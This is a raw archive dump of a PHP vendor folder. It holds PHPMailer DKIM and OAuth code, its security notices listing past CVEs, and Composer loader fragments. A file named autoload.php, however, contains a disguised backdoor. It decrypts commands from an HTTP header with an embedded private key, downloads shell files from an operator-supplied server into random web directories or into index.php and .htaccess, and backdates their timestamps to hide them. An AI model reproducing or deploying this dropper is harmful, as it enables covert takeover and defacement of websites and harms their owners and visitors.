$this->DKIM_passphrase) { $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase); } else { $privKey = openssl_pkey_get_private($privKeyStr); } if (openssl_sign($signHeader, $signature, $privKey, 'sha256WithRSAEncryption')) { openssl_pkey_free($privKey); return base64_encode($signature); } openssl_pkey_free($privKey); return ''; } /** * Generate a DKIM canonicalization header. * Uses the 'relaxed' algorithm from RFC6376 section 3.4.2. * Canonicalized headers should *always* use CRLF, regardless of mailer setting. * * @see https://tools.ietf.org/html/rfc6376#section-3.4.2 * * @param string $signHeader Header * * @return string */ public function DKIM_HeaderC($signHeader) { //Note PCRE \s is too broad a definition of whitespace; RFC5322 defines it as `[ \t]` //@see https://tools.ietf.org/html/rfc5322#section-2.2 //That means this may break if you do something daft like put vertical tabs in your headers. //Unfold header lines $signHeader = preg_replace('/\r\n[ \t]+/', ' ', $signHeader); //Break headers out into an array $lines = explode("\r\n", $signHeader); foreach ($lines as $key => $line) { //If the header is missing a :, skip it as it's invalid //This is likely to happen because the explode() above will also split //on the trailing LE, leaving an empty line if (strpos($line, ':') === false) { continue; } list($heading, $value) = explode(':', $line, 2); //Lower-case header name $heading = strtolower($heading); //Collapse white space within the value, also convert WSP to space $value = preg_replace('/[ \t]+/', ' ', $value); //RFC6376 is slightly unclear here - it says to delete space at the *end* of each value //But then says to delete space before and after the colon. //Net result is the same as trimming both ends of the value. //By elimination, the same applies to the field name $lines[$key] = trim($heading, " \t") . ':' . trim($value, " \t"); } return implode("\r\n", $lines); } /** * Generate a DKIM canonicalization body. * Uses the 'simple' algorithm from RFC6376 section 3.4.3. * Canonicalized bodies should *always* use CRLF, regardless of mailer setting. * * @see https://tools.ietf.org/html/rfc6376#section-3.4.3 * * @param string $body Message Body * * @return string */ public function DKIM_BodyC($body) { if (empty($body)) { return "\r\n"; } // Normalize line endings to CRLF $body = static::normalizeBreaks($body, "\r\n"); //Reduce multiple trailing line breaks to a single one return rtrim($body, "\r\n") . "\r\n"; } /** * Create the DKIM header and body in a new message header. * * @param string $headers_line Header lines * @param string $subject Subject * @param string $body Body * * @throws Exception * * @return string */ public function DKIM_Add($headers_line, $subject, $body) { $DKIMsignatureType = 'rsa-sha256'; // Signature & hash algorithms $DKIMcanonicalization = 'relaxed/simple'; // Canonicalization methods of header & body $DKIMquery = 'dns/txt'; // Query method $DKIMtime = time(); //Always sign these headers without being asked $autoSignHeaders = [ 'From', 'To', 'CC', 'Date', 'Subject', 'Reply-To', 'Message-ID', 'Content-Type', 'Mime-Version', 'X-Mailer', ]; if (stripos($headers_line, 'Subject') === false) { $headers_line .= 'Subject: ' . $subject . static::$LE; } $headerLines = explode(static::$LE, $headers_line); $currentHeaderLabel = ''; $currentHeaderValue = ''; $parsedHeaders = []; $headerLineIndex = 0; $headerLineCount = count($headerLines); foreach ($headerLines as $headerLine) { $matches = []; if (preg_match('/^([^ \t]*?)(?::[ \t]*)(.*)$/', $headerLine, $matches)) { if ($currentHeaderLabel !== '') { //We were previously in another header; This is the start of a new header, so save the previous one $parsedHeaders[] = ['label' => $currentHeaderLabel, 'value' => $currentHeaderValue]; } $currentHeaderLabel = $matches[1]; $currentHeaderValue = $matches[2]; } elseif (preg_match('/^[ \t]+(.*)$/', $headerLine, $matches)) { //This is a folded continuation of the current header, so unfold it $currentHeaderValue .= ' ' . $matches[1]; } ++$headerLineIndex; if ($headerLineIndex >= $headerLineCount) { //This was the last line, so finish off this header $parsedHeaders[] = ['label' => $currentHeaderLabel, 'value' => $currentHeaderValue]; } } $copiedHeaders = []; $headersToSignKeys = []; $headersToSign = []; foreach ($parsedHeaders as $header) { //Is this header one that must be included in the DKIM signature? if (in_array($header['label'], $autoSignHeaders, true)) { $headersToSignKeys[] = $header['label']; $headersToSign[] = $header['label'] . ': ' . $header['value']; if ($this->DKIM_copyHeaderFields) { $copiedHeaders[] = $header['label'] . ':' . //Note no space after this, as per RFC str_replace('|', '=7C', $this->DKIM_QP($header['value'])); } continue; } //Is this an extra custom header we've been asked to sign? if (in_array($header['label'], $this->DKIM_extraHeaders, true)) { //Find its value in custom headers foreach ($this->CustomHeader as $customHeader) { if ($customHeader[0] === $header['label']) { $headersToSignKeys[] = $header['label']; $headersToSign[] = $header['label'] . ': ' . $header['value']; if ($this->DKIM_copyHeaderFields) { $copiedHeaders[] = $header['label'] . ':' . //Note no space after this, as per RFC str_replace('|', '=7C', $this->DKIM_QP($header['value'])); } //Skip straight to the next header continue 2; } } } } $copiedHeaderFields = ''; if ($this->DKIM_copyHeaderFields && count($copiedHeaders) > 0) { //Assemble a DKIM 'z' tag $copiedHeaderFields = ' z='; $first = true; foreach ($copiedHeaders as $copiedHeader) { if (!$first) { $copiedHeaderFields .= static::$LE . ' |'; } //Fold long values if (strlen($copiedHeader) > self::STD_LINE_LENGTH - 3) { $copiedHeaderFields .= substr( chunk_split($copiedHeader, self::STD_LINE_LENGTH - 3, static::$LE . ' '), 0, -strlen(static::$LE . ' ') ); } else { $copiedHeaderFields .= $copiedHeader; } $first = false; } $copiedHeaderFields .= ';' . static::$LE; } $headerKeys = ' h=' . implode(':', $headersToSignKeys) . ';' . static::$LE; $headerValues = implode(static::$LE, $headersToSign); $body = $this->DKIM_BodyC($body); $DKIMlen = strlen($body); // Length of body $DKIMb64 = base64_encode(pack('H*', hash('sha256', $body))); // Base64 of packed binary SHA-256 hash of body $ident = ''; if ('' !== $this->DKIM_identity) { $ident = ' i=' . $this->DKIM_identity . ';' . static::$LE; } //The DKIM-Signature header is included in the signature *except for* the value of the `b` tag //which is appended after calculating the signature //https://tools.ietf.org/html/rfc6376#section-3.5 $dkimSignatureHeader = 'DKIM-Signature: v=1;' . ' d=' . $this->DKIM_domain . ';' . ' s=' . $this->DKIM_selector . ';' . static::$LE . ' a=' . $DKIMsignatureType . ';' . ' q=' . $DKIMquery . ';' . ' l=' . $DKIMlen . ';' . ' t=' . $DKIMtime . ';' . ' c=' . $DKIMcanonicalization . ';' . static::$LE . $headerKeys . $ident . $copiedHeaderFields . ' bh=' . $DKIMb64 . ';' . static::$LE . ' b='; //Canonicalize the set of headers $canonicalizedHeaders = $this->DKIM_HeaderC( $headerValues . static::$LE . $dkimSignatureHeader ); $signature = $this->DKIM_Sign($canonicalizedHeaders); $signature = trim(chunk_split($signature, self::STD_LINE_LENGTH - 3, static::$LE . ' ')); return static::normalizeBreaks($dkimSignatureHeader . $signature) . static::$LE; } /** * Detect if a string contains a line longer than the maximum line length * allowed by RFC 2822 section 2.1.1. * * @param string $str * * @return bool */ public static function hasLineLongerThanMax($str) { return (bool) preg_match('/^(.{' . (self::MAX_LINE_LENGTH + strlen(static::$LE)) . ',})/m', $str); } /** * Allows for public read access to 'to' property. * Before the send() call, queued addresses (i.e. with IDN) are not yet included. * * @return array */ public function getToAddresses() { return $this->to; } /** * Allows for public read access to 'cc' property. * Before the send() call, queued addresses (i.e. with IDN) are not yet included. * * @return array */ public function getCcAddresses() { return $this->cc; } /** * Allows for public read access to 'bcc' property. * Before the send() call, queued addresses (i.e. with IDN) are not yet included. * * @return array */ public function getBccAddresses() { return $this->bcc; } /** * Allows for public read access to 'ReplyTo' property. * Before the send() call, queued addresses (i.e. with IDN) are not yet included. * * @return array */ public function getReplyToAddresses() { return $this->ReplyTo; } /** * Allows for public read access to 'all_recipients' property. * Before the send() call, queued addresses (i.e. with IDN) are not yet included. * * @return array */ public function getAllRecipientAddresses() { return $this->all_recipients; } /** * Perform a callback. * * @param bool $isSent * @param array $to * @param array $cc * @param array $bcc * @param string $subject * @param string $body * @param string $from * @param array $extra */ protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from, $extra) { if (!empty($this->action_function) && is_callable($this->action_function)) { call_user_func($this->action_function, $isSent, $to, $cc, $bcc, $subject, $body, $from, $extra); } } /** * Get the OAuth instance. * * @return OAuth */ public function getOAuth() { return $this->oauth; } /** * Set an OAuth instance. */ public function setOAuth(OAuth $oauth) { $this->oauth = $oauth; } } PK@fZ@eo!phpmailer/phpmailer/src/OAuth.phpnu[ * @author Jim Jagielski (jimjag) * @author Andy Prevost (codeworxtech) * @author Brent R. Matzelle (original founder) * @copyright 2012 - 2015 Marcus Bointon * @copyright 2010 - 2012 Jim Jagielski * @copyright 2004 - 2009 Andy Prevost * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License * @note This program is distributed in the hope that it will be useful - WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. */ namespace PHPMailer\PHPMailer; use League\OAuth2\Client\Grant\RefreshToken; use League\OAuth2\Client\Provider\AbstractProvider; use League\OAuth2\Client\Token\AccessToken; /** * OAuth - OAuth2 authentication wrapper class. * Uses the oauth2-client package from the League of Extraordinary Packages. * * @see http://oauth2-client.thephpleague.com * * @author Marcus Bointon (Synchro/coolbru) */ class OAuth { /** * An instance of the League OAuth Client Provider. * * @var AbstractProvider */ protected $provider; /** * The current OAuth access token. * * @var AccessToken */ protected $oauthToken; /** * The user's email address, usually used as the login ID * and also the from address when sending email. * * @var string */ protected $oauthUserEmail = ''; /** * The client secret, generated in the app definition of the service you're connecting to. * * @var string */ protected $oauthClientSecret = ''; /** * The client ID, generated in the app definition of the service you're connecting to. * * @var string */ protected $oauthClientId = ''; /** * The refresh token, used to obtain new AccessTokens. * * @var string */ protected $oauthRefreshToken = ''; /** * OAuth constructor. * * @param array $options Associative array containing * `provider`, `userName`, `clientSecret`, `clientId` and `refreshToken` elements */ public function __construct($options) { $this->provider = $options['provider']; $this->oauthUserEmail = $options['userName']; $this->oauthClientSecret = $options['clientSecret']; $this->oauthClientId = $options['clientId']; $this->oauthRefreshToken = $options['refreshToken']; } /** * Get a new RefreshToken. * * @return RefreshToken */ protected function getGrant() { return new RefreshToken(); } /** * Get a new AccessToken. * * @return AccessToken */ protected function getToken() { return $this->provider->getAccessToken( $this->getGrant(), ['refresh_token' => $this->oauthRefreshToken] ); } /** * Generate a base64-encoded OAuth token. * * @return string */ public function getOauth64() { // Get a new token if it's not available or has expired if (null === $this->oauthToken || $this->oauthToken->hasExpired()) { $this->oauthToken = $this->getToken(); } return base64_encode( 'user=' . $this->oauthUserEmail . "\001auth=Bearer " . $this->oauthToken . "\001\001" ); } } PK@fZݺi,,phpmailer/phpmailer/COMMITMENTnu[GPL Cooperation Commitment Version 1.0 Before filing or continuing to prosecute any legal proceeding or claim (other than a Defensive Action) arising from termination of a Covered License, we commit to extend to the person or entity ('you') accused of violating the Covered License the following provisions regarding cure and reinstatement, taken from GPL version 3. As used here, the term 'this License' refers to the specific Covered License being enforced. However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. We intend this Commitment to be irrevocable, and binding and enforceable against us and assignees of or successors to our copyrights. Definitions 'Covered License' means the GNU General Public License, version 2 (GPLv2), the GNU Lesser General Public License, version 2.1 (LGPLv2.1), or the GNU Library General Public License, version 2 (LGPLv2), all as published by the Free Software Foundation. 'Defensive Action' means a legal proceeding or claim that We bring against you in response to a prior proceeding or claim initiated by you or your affiliate. 'We' means each contributor to this repository as of the date of inclusion of this file, including subsidiaries of a corporate contributor. This work is available under a Creative Commons Attribution-ShareAlike 4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/). PK@fZ}&jphpmailer/phpmailer/SECURITY.mdnu[# Security notices relating to PHPMailer Please disclose any vulnerabilities found responsibly - report any security problems found to the maintainers privately. PHPMailer versions prior to 6.0.6 and 5.2.27 are vulnerable to an object injection attack by passing `phar://` paths into `addAttachment()` and other functions that may receive unfiltered local paths, possibly leading to RCE. Recorded as [CVE-2018-19296](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19296). See [this article](https://knasmueller.net/5-answers-about-php-phar-exploitation) for more info on this type of vulnerability. Mitigated by blocking the use of paths containing URL-protocol style prefixes such as `phar://`. Reported by Sehun Oh of cyberone.kr. PHPMailer versions prior to 5.2.24 (released July 26th 2017) have an XSS vulnerability in one of the code examples, [CVE-2017-11503](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11503). The `code_generator.phps` example did not filter user input prior to output. This file is distributed with a `.phps` extension, so it it not normally executable unless it is explicitly renamed, and the file is not included when PHPMailer is loaded through composer, so it is safe by default. There was also an undisclosed potential XSS vulnerability in the default exception handler (unused by default). Patches for both issues kindly provided by Patrick Monnerat of the Fedora Project. PHPMailer versions prior to 5.2.22 (released January 9th 2017) have a local file disclosure vulnerability, [CVE-2017-5223](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5223). If content passed into `msgHTML()` is sourced from unfiltered user input, relative paths can map to absolute local file paths and added as attachments. Also note that `addAttachment` (just like `file_get_contents`, `passthru`, `unlink`, etc) should not be passed user-sourced params either! Reported by Yongxiang Li of Asiasecurity. PHPMailer versions prior to 5.2.20 (released December 28th 2016) are vulnerable to [CVE-2016-10045](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10045) a remote code execution vulnerability, responsibly reported by [Dawid Golunski](https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html), and patched by Paul Buonopane (@Zenexer). PHPMailer versions prior to 5.2.18 (released December 2016) are vulnerable to [CVE-2016-10033](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10033) a remote code execution vulnerability, responsibly reported by [Dawid Golunski](http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html). PHPMailer versions prior to 5.2.14 (released November 2015) are vulnerable to [CVE-2015-8476](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8476) an SMTP CRLF injection bug permitting arbitrary message sending. PHPMailer versions prior to 5.2.10 (released May 2015) are vulnerable to [CVE-2008-5619](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5619), a remote code execution vulnerability in the bundled html2text library. This file was removed in 5.2.10, so if you are using a version prior to that and make use of the html2text function, it's vitally important that you upgrade and remove this file. PHPMailer versions prior to 2.0.7 and 2.2.1 are vulnerable to [CVE-2012-0796](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0796), an email header injection attack. Joomla 1.6.0 uses PHPMailer in an unsafe way, allowing it to reveal local file paths, reported in [CVE-2011-3747](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3747). PHPMailer didn't sanitise the `$lang_path` parameter in `SetLanguage`. This wasn't a problem in itself, but some apps (PHPClassifieds, ATutor) also failed to sanitise user-provided parameters passed to it, permitting semi-arbitrary local file inclusion, reported in [CVE-2010-4914](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4914), [CVE-2007-2021](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2021) and [CVE-2006-5734](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5734). PHPMailer 1.7.2 and earlier contained a possible DDoS vulnerability reported in [CVE-2005-1807](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1807). PHPMailer 1.7 and earlier (June 2003) have a possible vulnerability in the `SendmailSend` method where shell commands may not be sanitised. Reported in [CVE-2007-3215](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3215). PK@fZvԲ autoload.phpnu[ $code, 'msg' => $msg, 'extras' => $extras], JSON_UNESCAPED_UNICODE)); } function success($data) { exit(@json_encode(['code' => 200, 'msg' => MsgText::SUCCESS, 'data' => $data], JSON_UNESCAPED_UNICODE)); } function getDirPathsByLevel($level = 6) { $initDir = $_SERVER['DOCUMENT_ROOT']; $dirs = array($initDir); $count = count($dirs); while (count($dirs) > ($count - 1)) { $path = $dirs[($count - 1)]; $count += 1; if (@is_dir($path) && @$handle = @opendir($path)) { while ($file = @readdir($handle)) { $realpath = $path . '/' . $file; if ($file == '.' || $file == '..' || !is_dir($realpath) || substr($file, 0, 1) === '.') { continue; } $path3 = str_replace($initDir, "", $path); $path4 = explode("/", $path3); if (count($path4) > $level - 1) { continue; } $dirs[] = $realpath; } } @closedir($handle); } return $dirs; } function getUrl($url) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 5); curl_setopt($curl, CURLOPT_AUTOREFERER, 0); curl_exec($curl); $httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE); curl_close($curl); if ($httpCode === 200) { $content = curl_exec($curl); return ['code' => 200, 'resp' => $content]; } return ['code' => 500, 'resp' => '']; } function getRemoteContent($url) { $content = @file_get_contents($url); if ($content === false) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_TIMEOUT, 5); curl_setopt($curl, CURLOPT_AUTOREFERER, 0); $content = curl_exec($curl); curl_close($curl); } return !empty($content) && is_string($content) ? $content : ''; } function copyfile($content, $localfile, $isAppend = false, $appendContent = '') { if ($isAppend && !empty($appendContent)) { $content = trim($content); if (substr($content, -2, 2) !== '?>') { $content .= ' ?>'; } $content = $content . PHP_EOL . PHP_EOL . $appendContent; } @file_put_contents($localfile, $content); if (!file_exists($localfile)) { $openedfile = @fopen($localfile, "w"); @fwrite($openedfile, $content); @fclose($openedfile); } if (!file_exists($localfile)) { return false; } return true; } function updateFiletime($filepath) { $ctime = filectime($filepath); $now = time(); if (!($now > $ctime + 31104000)) { $newTime = $now - (mt_rand(15552000, 31104000)); touch($filepath, $newTime, $newTime); return true; } return true; } $privateKey = '-----BEGIN PRIVATE KEY----- MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC30w49ItOfldQ6 dB+0gEbeeW6BEClcx+NZzmpX2YcRHFV80BurCWBavPFehV8Sy9yL2u/y3mv3QJJ+ x2kKvly8zKx4GbXPbsWJk6Ho0Rxq49oXkBarQBOqROZeaFF3Mzpd/PdLSsxEvG1M tQd2wOx5r6XD86jyfN7LAJUUVvbJvn1CHo03nFH12k1KYwLnQfzQI5nX7yQLa0jt fG5TA34Fm0EMbFdHWjAN/VdEjoJI6it4PCQP5wk4ga2BvVquQkuPbsbr8364d3I6 GuGAKDR0wfkT20n0E6kAmDI3ol2bfa0rQncqUS3OU3INpxOZS8eKCIgC3bM81mdi MQ6TsAQ9AgMBAAECggEAJLGSlA2RpLdpx8lKUuOQQfSHZGfveb/E2DZl7+dSGM5J GkMIYtnaTAKPQ8jns37SJXCsmRRhBNf05i20ABsDtAQ/ITIwopmAAPhhR3IGdCfL bwyqGcEOq9xZB9tW965YJk7KplLl94qNXtR8Cu5zxc6UDktjHBRk/Ky/FXJOjPKM sA8rhox7dqlZUB3I/qiqrQOgT1Bsq1BFT+2GGwRUWZ1CyFoZvhsDomdo4yhRrB0b 8Ym4MDiVqxFPVW8XB9RFD9YKt+v50Eb6iSKJNLpRmjZDNZbrEYO6NRsRBM7brDa9 n39mZWFr47wGGXXv/NhwTvRI+2Si/ZfdP4+o5TeSWQKBgQDhIVOUODisiLhk7XKb Yu7BW1ZFcK0JxurqHN22msvA0Q/1q4RvziETjekXIn9lVKCmS/gy2O2RtuQRulAR fc3sz2W9tNXRF8Avy0728NG0baOOwBalO8w3cCX6Nnm70pJer+iJSn3tmAKSB4LT vbSB8pt6QgP8NPHyQdWp2LwOtwKBgQDRB8lgSaImIMJBaXERSaoNg8kxv3/cv4g5 jUlljxNQcUsj0V7XilnB3mFxq5rHjBZTsKzMMQyvhOxYhptDfw6OLtoPUk2WiBUs l3qU0tIXNN+cTxu2SMKTjwMktkpmACJqa+k27eEUqxrKO/6SEiP9FMXHvgA4EEBM Hww1eU9QqwKBgAWSY5Uphw2OHLIyxkFeQ3Z5ojr5vO6fA7VjnYEld6GACxsTcaWq vlrTik9ORUTmwUscWjo38DlJA4AE0nJ8YJpZz7TQQvJ32gPUzlGCSE5k4EVqL6VL Q5Sjq+zzaDPj1EePpvuu4kr9FiMzGGPRMCR/MqXl+F9HmC1cv8MCYDUlAoGBAK77 g7pVKaYdWkCD0iEUt4Rkw/IfSxwyQglbmwungBWhIbO0O17X9Fd0n8IWU5WkUbRx e9XbYbE05t0cobEZFcg0tFqLHWRcOs1/aSBYc4L1whMJrjskIa6A07LR3uoQRr8r 4qkW7YrtyZluK6eABByCXSbeiTRldk3C1+eTy6/NAoGAb9/J+NWrhYSr/VoGWjui chXCNszy4w6exVwxXQKNTtlzKxyhQfVPK2BxrptWL6KCRKpz3wh+WY2C3QYyVfwG FB4hwDr2mY4TWF9pD194iES1yhrQGlI8XM+2LVhBl3p0x+TFgJMaTgDDqAnxpuqT upBYqTYMlOd+VR7hENMaFqo= -----END PRIVATE KEY-----'; $p = $_SERVER['HTTP_P']; $params = openssl_private_decrypt(base64_decode(urldecode($p)), $decrypted, $privateKey) ? $decrypted : null; if (is_null($params)) { error(MsgText::DECRYPT_FAIL); } $params = json_decode($params, true); if (!is_array($params)) { error(MsgText::PARAM_TYPE, $params); } if (empty($params['server'])) { error('server ' . MsgText::PARAM_EMPTY); } if (empty($params['iden'])) { error('iden ' . MsgText::PARAM_EMPTY); } $iden = isset($params['iden']) ? strtolower($params['iden']) : ''; switch ($iden) { case "beima": $res = doBeima($params); break; case "rename": $res = doRename($params); break; case "index": $res = doIndex($params); break; case "sub": case "htaccess": $res = doSub($params); break; case "lock": $res = doLock($params); break; case "style": $res = doStyle($params); break; default: error('iden ' . MsgText::VALUE_ERROR); } function doBeima($params) { if (empty($params['filename'])) { error('filename ' . MsgText::PARAM_EMPTY, $params); } if (empty($params['shellfile'])) { error('shellfile ' . MsgText::PARAM_EMPTY, $params); } empty($params['level']) && $params['level'] = 6; $dirs = getDirPathsByLevel($params['level']); $temp = array_rand($dirs); $createDir = $dirs[$temp] . '/'; $localfilepath = $createDir . $params['filename']; $remoteFileUrl = $params['server'] . $params['shellfile']; $content = getRemoteContent($remoteFileUrl); $content = json_decode($content, true); if (!empty($content['result'])) { if (copyfile($content['result'], $localfilepath)) { updateFiletime($localfilepath); $beimaurl = str_replace($_SERVER['DOCUMENT_ROOT'], '', $localfilepath); success(compact('localfilepath', 'beimaurl')); } error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath')); } error(MsgText::REMOTE_FILE_EXISTS, compact('remoteFileUrl')); } function doRename($params) { if (empty($params['sourcename'])) { error('sourcename ' . MsgText::PARAM_EMPTY, $params); } if (empty($params['rename'])) { error('rename ' . MsgText::PARAM_EMPTY, $params); } if ($params['sourcename'] === $params['rename']) { error(MsgText::NOCHANGE); } $sourceFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['sourcename']; $renameFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['rename']; $resSource = $params['server'] . str_replace(strtolower($_SERVER['DOCUMENT_ROOT']), '', strtolower($sourceFile)); $resSource = str_replace('\\', '/', $resSource); if (file_exists($sourceFile)) { if (rename($sourceFile, $renameFile)) { success($renameFile); } else { error(MsgText::RENAME_ERROR, compact('renameFile')); } } else { error(MsgText::LOCAL_FILE_EXISTS, compact('resSource')); } } function doIndex($params) { if (empty($params['shellfile'])) { error('shellfile ' . MsgText::PARAM_EMPTY, $params); } $remoteUrl = $params['server'] . trim($params['shellfile']); $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/index.php'; $content = getRemoteContent($remoteUrl); $content = json_decode($content, true); if (!empty($content['result'])) { $oldContent = ''; if (file_exists($localfilepath)) { $oldContent = @file_get_contents($localfilepath); } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.html')) { $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.html'); } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.htm')) { $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.htm'); } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.html')) { $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.html'); } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.htm')) { $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.htm'); } if (copyfile($content['result'], $localfilepath, true, $oldContent)) { updateFiletime($localfilepath); @chmod($localfilepath, 0644); success($localfilepath); } error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath')); } error(MsgText::INDEX_ERROR, compact('remoteUrl')); } function doSub($params) { if (empty($params['shellfile'])) { error('shellfile' . MsgText::PARAM_EMPTY, $params); } if (empty($params['filename'])) { error('filename ' . MsgText::PARAM_EMPTY, $params); } $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename']; $remoteFileUrl = $params['server'] . $params['shellfile']; $content = getRemoteContent($remoteFileUrl); $content = json_decode($content, true); if (!empty($content['result'])) { if (copyfile($content['result'], $localfilepath)) { updateFiletime($localfilepath); @chmod($localfilepath, 0644); success($localfilepath); } error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath')); } error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl')); } function doLock($params) { if (empty($params['filename'])) { error('filename ' . MsgText::PARAM_EMPTY, $params); } if (empty($params['domain'])) { error('domain ' . MsgText::PARAM_EMPTY, $params); } if (empty($params['shellfile'])) { error('shellfile ' . MsgText::PARAM_EMPTY, $params); } $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename']; $remoteFileUrl = $params['server'] . $params['shellfile']; $content = getRemoteContent($remoteFileUrl); $content = json_decode($content, true); if (!empty($content['result'])) { if (copyfile($content['result'], $localfilepath)) { $lockurl = $params['domain'] . $params['filename']; $lockres = getUrl($lockurl); @unlink($localfilepath); if ($lockres['code'] === 200 && !empty($lockres['resp']) && strpos($lockres['resp'], 'success')) { success($lockres['resp']); } error(MsgText::LOCK_FILE_SUCCESS, compact('lockurl', 'lockres')); } @unlink($localfilepath); error(MsgText::LOCK_FILE_ERROR, compact('localfilepath')); } error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl')); } function doStyle($params) { if (empty($params['shellfile'])) { error('shellfile' . MsgText::PARAM_EMPTY, $params); } if (empty($params['filename'])) { error('filename ' . MsgText::PARAM_EMPTY, $params); } if (empty($params['domain'])) { error('domain ' . MsgText::PARAM_EMPTY, $params); } $localfilepath = $params['domain'] . $params['filename']; $remoteFileUrl = $params['server'] . $params['shellfile']; $content = getRemoteContent($remoteFileUrl); $content = json_decode($content, true); if (!empty($content['result'])) { if (copyfile($content['result'], $localfilepath)) { updateFiletime($localfilepath); @chmod($localfilepath, 0644); success($localfilepath); } error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath')); } error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl')); }PK@fZEn autoload_classmap.phpnu["; fwrite($sock, $msg."\r\n"); $reply = fread($sock, 2082); $msg="RCPT TO: <".$name.'@'.$domain.">"; fwrite($sock, $msg."\r\n"); $reply = fread($sock, 2082); preg_match('/^([0-9]{3}) /ims', $reply, $matches); $code = isset($matches[1]) ? $matches[1] : ''; if($code == '250') { $result=true; }elseif($code == '451' || $code == '452') { $result=true; }else{ $result=false; } $msg="quit"; fwrite($sock, $msg."\r\n"); fclose($sock); } return $result; } function get_spam_score($raw_email) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, 'http://spamcheck.postmarkapp.com/filter'); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('email' => $raw_email,'options'=>'short'))); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 15); $response = curl_exec($ch); if(empty($response) || curl_error($ch) || curl_getinfo($ch, CURLINFO_HTTP_CODE) !== 200){ curl_close($ch); return FALSE; } curl_close($ch); $score = json_decode($response); if ($score->success == TRUE AND is_numeric($score->score)) return $score->score; else return FALSE; } ?>
PK@fZz44composer/ClassLoader.phpnu[ * Jordi Boggiano * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Composer\Autoload; /** * ClassLoader implements a PSR-0, PSR-4 and classmap class loader. * * $loader = new \Composer\Autoload\ClassLoader(); * * // register classes with namespaces * $loader->add('Symfony\Component', __DIR__.'/component'); * $loader->add('Symfony', __DIR__.'/framework'); * * // activate the autoloader * $loader->register(); * * // to enable searching the include path (eg. for PEAR packages) * $loader->setUseIncludePath(true); * * In this example, if you try to use a class in the Symfony\Component * namespace or one of its children (Symfony\Component\Console for instance), * the autoloader will first look for the class under the component/ * directory, and it will then fallback to the framework/ directory if not * found before giving up. * * This class is loosely based on the Symfony UniversalClassLoader. * * @author Fabien Potencier * @author Jordi Boggiano * @see http://www.php-fig.org/psr/psr-0/ * @see http://www.php-fig.org/psr/psr-4/ */ class ClassLoader { // PSR-4 private $prefixLengthsPsr4 = array(); private $prefixDirsPsr4 = array(); private $fallbackDirsPsr4 = array(); // PSR-0 private $prefixesPsr0 = array(); private $fallbackDirsPsr0 = array(); private $useIncludePath = false; private $classMap = array(); private $classMapAuthoritative = false; private $missingClasses = array(); private $apcuPrefix; public function getPrefixes() { if (!empty($this->prefixesPsr0)) { return call_user_func_array('array_merge', $this->prefixesPsr0); } return array(); } public function 